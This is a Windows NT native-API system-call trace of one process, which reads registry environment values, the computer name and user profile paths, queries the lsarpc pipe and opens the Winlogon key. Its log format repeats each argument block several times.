 04220   712   NtEnumerateValueKey  (652, 2, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) , Data= (652, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) }, 58, ) == 0x0
 04221   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04222   712   NtEnumerateValueKey  (652, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) , Data= (652, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) }, 46, ) == 0x0
 04223   712   NtEnumerateValueKey  (652, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) , Data= (652, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) }, 72, ) == 0x0
 04224   712   NtEnumerateValueKey  (652, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) , Data= (652, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) }, 58, ) == 0x0
 04225   712   NtEnumerateValueKey  (652, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) , Data= (652, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) }, 154, ) == 0x0
 04226   712   NtEnumerateValueKey  (652, 7, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) , Data= (652, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) }, 66, ) == 0x0
 04227   712   NtEnumerateValueKey  (652, 8, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) , Data= (652, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) }, 64, ) == 0x0
 04228   712   NtEnumerateValueKey  (652, 9, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) , Data= (652, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) }, 134, ) == 0x0
 04229   712   NtEnumerateValueKey  (652, 10, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (652, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04230   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04231   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04232   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\TEMP"}, 24702336, ... ) }, 24702336, ... ) == 0x0
 04233   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04234   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04235   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04236   712   NtEnumerateValueKey  (652, 11, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (652, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04237   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04238   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04239   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\TEMP"}, 24702336, ... ) }, 24702336, ... ) == 0x0
 04240   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04241   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04242   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04243   712   NtClose  (652, ... ) == 0x0
 04244   712   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\ComputerName"}, ... 652, ) }, ... 652, ) == 0x0
 04245   712   NtOpenKey  (0x20019, {24, 652, 0x40, 0, 0,  (0x20019, {24, 652, 0x40, 0, 0, "ActiveComputerName"}, ... 656, ) }, ... 656, ) == 0x0
 04246   712   NtQueryValueKey  (656,  (656, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Full, 108, ... TitleIdx=0, Type=1, Name= (656, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Data= (656, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) }, 60, ) == 0x0
 04247   712   NtClose  (656, ... ) == 0x0
 04248   712   NtClose  (652, ... ) == 0x0
 04249   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04250   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 652, ) }, ... 652, ) == 0x0
 04251   712   NtQueryValueKey  (652,  (652, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (652, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) }, 86, ) == 0x0
 04252   712   NtClose  (652, ... ) == 0x0
 04253   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 652, ) }, ... 652, ) == 0x0
 04254   712   NtQueryValueKey  (652,  (652, "DefaultUserProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="D\0e\0f\0a\0u\0l\0t\0 \0U\0s\0e\0r\0\0\0"}, 38, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (652, "DefaultUserProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="D\0e\0f\0a\0u\0l\0t\0 \0U\0s\0e\0r\0\0\0"}, 38, ) }, 38, ) == 0x0
 04255   712   NtClose  (652, ... ) == 0x0
 04256   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04257   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion"}, ... 652, ) }, ... 652, ) == 0x0
 04258   712   NtQueryValueKey  (652,  (652, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (652, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) }, 46, ) == 0x0
 04259   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04260   712   NtQueryValueKey  (652,  (652, "CommonFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\0\0"}, 72, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (652, "CommonFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\0\0"}, 72, ) }, 72, ) == 0x0
 04261   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04262   712   NtClose  (652, ... ) == 0x0
 04263   712   NtQueryInformationToken  (640, User, 200, ... {token info, class 1, size 36}, 36, ) == 0x0
 04264   712   NtOpenKey  (0x20019, {24, 124, 0x40, 0, 0,  (0x20019, {24, 124, 0x40, 0, 0, "S-1-5-21-1078081533-484763869-839522115-1003"}, ... 652, ) }, ... 652, ) == 0x0
 04265   712   NtOpenThreadToken  (-2, 0x2000c, 1, ... ) == STATUS_NO_TOKEN
 04266   712   NtQueryInformationToken  (640, Type, 4, ... {token info, class 8, size 4}, 4, ) == 0x0
 04267   712   NtDuplicateToken  (640, 0xc, {24, 0, 0x0, 0, 24703720, 0x0}, 0, 2, ... ) == STATUS_ACCESS_DENIED
 04268   712   NtQueryInformationToken  (640, User, 200, ... {token info, class 1, size 36}, 36, ) == 0x0
 04269   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04270   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 656, ) == 0x0
 04271   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04272   712   NtSetInformationThread  (-2, ImpersonationToken, {ImpToken=0,}, 4, ... ) == 0x0
 04273   712   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 24701924,  (0xc0100080, {24, 0, 0x40, 0, 24701924, "\??\PIPE\lsarpc"}, 0x0, 0, 3, 1, 64, 0, 0, ... 660, {status=0x0, info=1}, ) }, 0x0, 0, 3, 1, 64, 0, 0, ... 660, {status=0x0, info=1}, ) == 0x0
 04274   712   NtSetInformationFile  (660, 24701980, 8, Pipe, ... {status=0x0, info=0}, ) == 0x0
 04275   712   NtSetInformationFile  (660, 24701972, 8, Completion, ... {status=0x0, info=0}, ) == 0x0
 04276   712   NtSetInformationThread  (-2, ImpersonationToken, {ImpToken=0,}, 4, ... ) == 0x0
 04277   712   NtWriteFile  (660, 609, 0, 0,  (660, 609, 0, 0, "\5\0\13\3\20\0\0\0H\0\0\0\1\0\0\0\270\20\270\20\0\0\0\0\1\0\0\0\0\0\1\0xW4\224\22\315\253\357\0\1#Eg\211\253\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", 72, {0, 0}, 0, ... {status=0x0, info=72}, ) , 72, {0, 0}, 0, ... {status=0x0, info=72}, ) == 0x0
 04278   712   NtReadFile  (660, 609, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=68},  (660, 609, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20B\33\0\0\14\0\PIPE\lsass\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x0
 04279   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\1\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\230\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20B\33\0\0\14\0\PIPE\lsass\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , 64, 1024, ... {status=0x103, info=68},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\1\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\230\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20B\33\0\0\14\0\PIPE\lsass\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x103
 04280   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\2\0\0\0\\0\0\0\0\09\0\0\0\0\0W\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\320\362x\1\1\0\0\0\370\263\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\1\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0W\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 116, 1024, ... {status=0x103, info=48},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\2\0\0\0\\0\0\0\0\09\0\0\0\0\0W\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\320\362x\1\1\0\0\0\370\263\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\1\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0W\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
 04281   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\3\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0W\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\2\0\0\0\234\0\0\0\0\0\0\0 \264\27\0\1\0\0\0,\264\27\0 \0\0\0\1\0\0\0\16\0\20\08\264\27\0H\264\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0\0\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=180},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\3\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0W\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\2\0\0\0\234\0\0\0\0\0\0\0 \264\27\0\1\0\0\0,\264\27\0 \0\0\0\1\0\0\0\16\0\20\08\264\27\0H\264\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0\0\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , ) == 0x103
 04282   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04283   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\4\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\224\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\3\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 64, 1024, ... {status=0x103, info=48},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\4\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\224\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\3\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x103
 04284   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\5\0\0\0\\0\0\0\0\09\0\0\0\0\0X\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\314\362x\1\1\0\0\0\370\263\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\4\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0X\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 116, 1024, ... {status=0x103, info=48},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\5\0\0\0\\0\0\0\0\09\0\0\0\0\0X\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\314\362x\1\1\0\0\0\370\263\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\4\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0X\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
 04285   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\6\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0X\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\5\0\0\0\234\0\0\0\0\0\0\0 \264\27\0\1\0\0\0,\264\27\0 \0\0\0\1\0\0\0\16\0\20\08\264\27\0H\264\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0\0\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=180},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\6\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0X\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\5\0\0\0\234\0\0\0\0\0\0\0 \264\27\0\1\0\0\0,\264\27\0 \0\0\0\1\0\0\0\16\0\20\08\264\27\0H\264\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0\0\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , ) == 0x103
 04286   712   NtOpenEvent  (0x100000, {24, 0, 0x0, 0, 0,  (0x100000, {24, 0, 0x0, 0, 0, "\INSTALLATION_SECURITY_HOLD"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04287   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04288   712   NtWriteFile  (660, 609, 0, 0,  (660, 609, 0, 0, "\5\0\16\3\20\0\0\0H\0\0\0\7\0\0\0\270\20\270\20B\33\0\0\1\0\0\0\1\0\1\0j(\319\14\261\320\21\233\250\0\300O\331.\365\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", 72, {0, 0}, 0, ... {status=0x0, info=72}, ) , 72, {0, 0}, 0, ... {status=0x0, info=72}, ) == 0x0
 04289   712   NtReadFile  (660, 609, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=56},  (660, 609, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=56}, "\5\0\17\3\20\0\0\08\0\0\0\7\0\0\0\270\20\270\20B\33\0\0\0\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x0
 04290   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0\32\0\0\0\7\0\0\0\2\0\0\0\1\0\0\0\1\0", 26, 1024, ... {status=0x103, info=56}, "\5\0\17\3\20\0\0\08\0\0\0\7\0\0\0\270\20\270\20B\33\0\0\0\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , 26, 1024, ... {status=0x103, info=56},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0\32\0\0\0\7\0\0\0\2\0\0\0\1\0\0\0\1\0", 26, 1024, ... {status=0x103, info=56}, "\5\0\17\3\20\0\0\08\0\0\0\7\0\0\0\270\20\270\20B\33\0\0\0\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x103
 04291   712   NtAllocateVirtualMemory  (-1, 1556480, 0, 4096, 4096, 4, ... 1556480, 4096, ) == 0x0
 04292   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04293   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04294   712   NtQueryInformationToken  (640, User, 200, ... {token info, class 1, size 36}, 36, ) == 0x0
 04295   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1078081533-484763869-839522115-1003"}, ... 664, ) }, ... 664, ) == 0x0
 04296   712   NtQueryValueKey  (664,  (664, "ProfileImagePath", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 104, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (664, "ProfileImagePath", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 104, ) }, 104, ) == 0x0
 04297   712   NtClose  (664, ... ) == 0x0
 04298   712   NtCreateKey  (0x2001f, {24, 652, 0x40, 0, 0,  (0x2001f, {24, 652, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon"}, 0, 0x0, 0, ... 664, 2, ) }, 0, 0x0, 0, ... 664, 2, ) == 0x0
